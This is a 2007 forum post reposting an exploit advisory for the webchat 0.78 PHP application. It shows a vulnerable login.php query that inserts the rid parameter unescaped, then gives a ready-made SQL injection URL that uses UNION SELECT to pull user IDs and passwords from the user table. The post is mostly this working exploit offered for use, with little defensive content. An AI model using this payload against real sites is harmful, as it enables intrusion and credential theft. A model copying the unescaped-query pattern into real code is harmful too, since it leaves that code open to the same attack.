zbeng Posted July 3, 2007 Report Share Posted July 3, 2007 ########################################################################### [webchat 0.78]## Class: SQL Injection # Published 28/06/2007 # Remote: Yes # Critical Level : Dangerous # Site: [url]http://sourceforge.net/projects/webdev-webchat/[/url]# Download: [url]http://downloads.sourceforge.net/webdev-webchat/webchat-078.zip?modtime=1046649600&big_mirror=0[/url]# Author: R00T[ATI] # Contact: [email]r00t.ati@gmail.com[/email] - [url]http://inclusionhunter.altervista.org/index.php[/url]# ######################################################################### Vulnerable code: login.php======================================================<? $q = new DB_Chat; $q->query("select * from room where rid='$rid'"); if ($q->next_record()) { ?>======================================================= Exploit : ============================================================================================================ [url]http://www.site.com/[/url][web_chat]/login.php?rid=-1'%20UNION%20ALL%20SELECT%20uid,pass,null,null,null%20from%20user%20WHERE%20uid=1/*============================================================================================================ Thanks To:======================================================All Root@Shell members;White_Sheep;SparrowRulez;st0ke;====================================================== Quote Link to comment Share on other sites More sharing options...